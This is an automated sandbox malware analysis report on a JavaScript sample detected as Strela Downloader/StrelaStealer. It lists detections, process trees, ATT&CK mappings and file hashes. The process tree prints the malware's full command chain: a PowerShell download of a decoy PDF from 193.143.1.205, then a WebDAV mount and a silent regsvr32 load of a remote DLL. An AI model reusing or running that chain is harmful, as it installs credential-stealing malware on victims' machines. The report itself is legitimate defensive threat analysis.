Windows
Analysis Report
78786270533822124.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 6304 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\78786 2705338221 24.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 5616 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\246 5214661258 97.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5276 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 2432 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 2012 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 992 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 4816 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 28 --field -trial-han dle=1600,i ,479854690 7868504267 ,386825949 9597347399 ,131072 -- disable-fe atures=Bac kForwardCa che,Calcul ateNativeW inOcclusio n,WinUseBr owserSpell Checker /p refetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 5936 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | ReversingLabs | Script-JS.Trojan.StrelaStealer | ||
7% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | unknown | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588576 |
Start date and time: | 2025-01-11 02:35:18 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 2s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 18 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 78786270533822124.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/63@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, CompPkgSrv.exe, WMIADAP.exe, SIHClient.exe
- Excluded IPs from analysis (whitelisted): 184.28.88.176, 162.159.61.3, 172.64.41.3, 184.28.90.27, 23.209.209.135, 199.232.210.172, 2.16.168.107, 2.16.168.105, 23.55.243.72, 23.55.243.81, 23.55.243.74, 23.55.243.75, 23.55.243.70, 23.55.243.80, 192.168.2.6, 13.107.246.45, 4.175.87.197, 34.237.241.83, 23.56.162.204
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, client.wns.windows.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
20:36:17 | API Interceptor | |
20:36:21 | API Interceptor | |
20:36:21 | API Interceptor | |
20:36:30 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7263179445792668 |
Encrypted: | false |
SSDEEP: | 1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0q:9JZj5MiKNnNhoxu/ |
MD5: | 9EA4C9C5358D2281FFD2EF3BABEBF277 |
SHA1: | A3D8210FE81A18E487301FF5AC630105535910BC |
SHA-256: | DF9C6E5034012B7E6EC0B3F4064A6041E4266D441A7B855DFC90C9EA8F386A73 |
SHA-512: | 67B8D985AF4B1B73882B0F144790A046C933AD655E795180BB594F7CF578E539928E903C73F7BF751379880B35987FD527899BF238F694E3869C9B43F3E7F6C6 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.755578344173612 |
Encrypted: | false |
SSDEEP: | 1536:dSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:dazaSvGJzYj2UlmOlOL |
MD5: | 798FD315746764DAA9E1D07FDE1A48AA |
SHA1: | F1E84E21B27D3ED7EE546639DB38F72882BA7779 |
SHA-256: | AB1E525636821D707C63652C4D048B0D21C39F9E91ACBFCEF3118358B5141CC1 |
SHA-512: | 2BD8851CD738F6AE2D32F4221791555AD642088826367E919CD2262687845A78C726F2D296DC636E7B30A58EF1C6E64C485C47CDCEBB1F8606D678C3FE309883 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.08029941034443144 |
Encrypted: | false |
SSDEEP: | 3:n1SlllEYeEmzeuNaAPaU1ltBWlolluxmO+l/SNxOf:1StEzYuNDPaUzgmOH |
MD5: | 8B429A3A74F48EA647B7E9CCA73AA40C |
SHA1: | 761359BD950E2FC5974608F4AF23103D19CAEF97 |
